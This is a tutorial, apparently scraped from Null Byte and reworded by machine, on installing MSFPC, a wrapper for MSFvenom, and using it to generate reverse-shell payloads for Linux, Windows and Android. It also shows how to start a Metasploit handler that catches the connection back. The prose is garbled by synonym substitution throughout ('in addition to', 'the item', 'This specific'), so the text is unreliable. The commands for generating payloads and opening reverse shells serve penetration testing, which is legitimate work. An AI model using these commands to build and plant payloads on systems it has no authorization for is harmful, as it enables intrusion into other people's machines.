2 weeks ago
14 Views

How to Simplify Payload Creation with MSFPC (MSFvenom Payload Creator) « Null Byte :: WonderHowTo

The default tool for payload generation is usually MSFvenom, a Metasploit standalone payload generator as well as encoder. This specific tool is usually an incredibly powerful tool for payload generation, although the item can be difficult in addition to requires a bit of reading for newer users.

Even after the initial reading, generating a basic payload requires quite a bit of typing on the user’s part. Today, we’re going to be looking at easier payload generation with MSFPC.

MSFPC, or the MSFvenom Payload Creator, is usually a bash wrapper over MSFvenom designed to make basic payload creation easier. The goal is usually to allow the user to create payloads as simply as possible, using a minimum of one argument! If you’ve had to use MSFvenom in any capacity within the past, you’ve probably already written a rough shell script to automate frequently generated payloads. Even if you have, This specific tool is usually definitely worth checking out.

Don’t Miss: Metasploit for the Aspiring Hacker, Part 5 (MSFvenom)

With that will out of the way, let’s get commenced!

Step 1: Install MSFPC

First, we’ll need to install MSFPC. The way of doing so will vary slightly by operating system.

Option 1: Installing on Kali Linux:

If you are installing MSFPC on Kali Linux, the item is usually included within the Kali repos, only set to manual install. You may already hold the item! To check, run the command which msfpc in any terminal emulator. If you don’t hold the item, you can use apt to install the item, as seen below.

apt install msfpc

Option 2: Installing on Generic Linux:

For Linux in addition to Unix variants which do not have This specific package available, we just need to pull the item down through GitHub in our favorite terminal emulator with the following command.

git clone https://github.com/g0tmi1k/mpc; cd mpc

Once we have a clone of the project, we will want to copy the item into a directory that will is usually within our path. The script itself suggests /usr/bin.

I personally don’t like to clutter up /usr/bin. the item’s easier for me to keep track of the tools that will I have compiled or pulled through GitHub by keeping them in their own directory. The decision is usually up to you.

Don’t Miss: How to Install the Metasploit Framework on macOS

Installing System-Wide:

In order to install in /usr/bin, change directories to your mpc directory in addition to configure permissions for the script using your terminal, as seen below.

cd /path/to/mpc
sudo chown root:root msfpc.sh
sudo chmod 755 msfpc.sh
sudo cp msfpc.sh /usr/bin

This specific set of commands alterations the owner in addition to group of the script to root in addition to root, respectively. We then configure the file permissions to 755, or RWXR-XR-X. Finally, we move the script into /usr/bin.

Installing User-Specific:

To install to a pentest folder in your home directory, open your terminal in addition to begin the process by typing the following.

mkdir ~/pentest
cd /path/to/mpc
chmod 700 msfpc.sh
cp msfpc.sh ~/pentest

You may already have a pentest directory. If This specific is usually the case, there’s no need to make a completely new one. The chmod command alterations the permissions on the script to RWX——. Then we copy the item over into our pentest directory.

We’re not done yet, because This specific directory isn’t a part of our path. In order to fix This specific, we need to edit our .bashrc in our home directory. I used Vim due to This specific, although you can use any editor you like. Type the following.

vim ~/.bashrc

Once you are editing, add the pentest directory to your path variable with This specific command:

PATH=$PATH:/path/to/my/pentest/directory

You can leave out the trailing forward slash.

Lastly, we need to either close the terminal window in addition to open a completely new one, or source our modified .bashrc.

source ~/.bashrc
which msfpc.sh

MSFPC is usually installed!

Step 2: Create a Linux Payload

today that will we hold the tool installed on our system of choice, let’s get down to generating payloads. For our first payload, we’ll just generate a basic Linux reverse TCP ELF payload using msfpc.sh.

For the first payload, I will be only passing just one argument to MSFPC.

msfpc.sh linux

The first thing to notice here is usually that will since I only told msfpc.sh I wanted to generate a Linux payload, in addition to nothing else, msfpc.sh doesn’t know what address we want to connect back to, so the item presents options. WAN is usually my external IP, lo is usually the localhost loop back interface, in addition to ens33 is usually my network interface.

I selected “ens33” in addition to proceeded. This specific can save some time if you don’t have your interface addresses memorized. The CMD output shows the full MSFvenom command that will was executed in order to generate This specific payload. the item’s quite verbose.

Don’t Miss: Getting commenced with Metasploit

Once I generate the payload, I test the item out by setting up a Metasploit handler. However, I don’t have to manually configure This specific handler. Msfpc.sh creates a file named similarly to the payload, with an .rc extension. In order to start a handler due to This specific payload, all I need to do is usually pull the resource file into Metasploit.

sudo msfconsole -q -r ‘/home/barrow/linux-shell-staged-reverse-tcp-443-elf.rc’

The reason for sudo in This specific command is usually because I am a non-privileged user attempting to bind to port 443. The -q argument tells msfconsole to skip the splash screen, in addition to the -r option tells msfconsole to load the resource file. Once that will’s done, I execute the payload, in addition to the item connects back giving me a reverse shell.

Step 3: Create a Windows Payload

For our Windows payload, I thought I’d change the item up in addition to create a lot of different payloads. Msfpc.sh allows for batch-creation of payloads. This specific means that will if I want to create all payloads that will msfpc.sh can create with MSFvenom for a particular target, I can do so easily with the command below.

msfpc.sh windows batch ens33

In This specific command, I’m telling msfpc.sh to create windows payloads using all available combinations, using the IP through my network interface. During the generation process, some errors may come up, although at the end, you will have a collection of Windows payloads in addition to RC files to launch with msfconsole.

Step 4: Generate an Android Payload

We’ve done Windows in addition to Linux. Let’s use msfpc.sh to generate a payload for Android devices. due to This specific example, I’ll generate an Android reverse TCP HTTPS Meterpreter payload. We can do This specific with the command below.

msfpc.sh apk HTTPS ens33

This specific command will create a reverse TCP payload for Android in addition to tunnel the item through HTTPS using my network interface as the IP address.

Payload Creation is usually today Even Easier

Msfpc.sh is usually a real timesaver when the item comes to creating basic payloads quickly. The main drawback to This specific script is usually that will the item genuinely only works for basic payloads. You aren’t going to get any encoding to bypass antivirus, although depending on your targets, This specific may not matter. Sometimes, you just need to create a quick payload, drop the item somewhere, in addition to call the item a day. In This specific scenario, msfpc.sh genuinely shines.

Throughout This specific article, I touched on a variety of options for msfpc.sh. There are many different options available, in addition to if you execute the program with the –help verbose, the script will give you a full help file. The help file is usually incredibly informative in addition to easy to read.

As always, stay safe out there in addition to if you have questions or comments, feel free to reach out to me on Twitter @0xBarrow or within the comments below.

Cover image in addition to screenshots by Barrow/Null Byte

Leave a Comment

Your email address will not be published. Required fields are marked *

1 × five =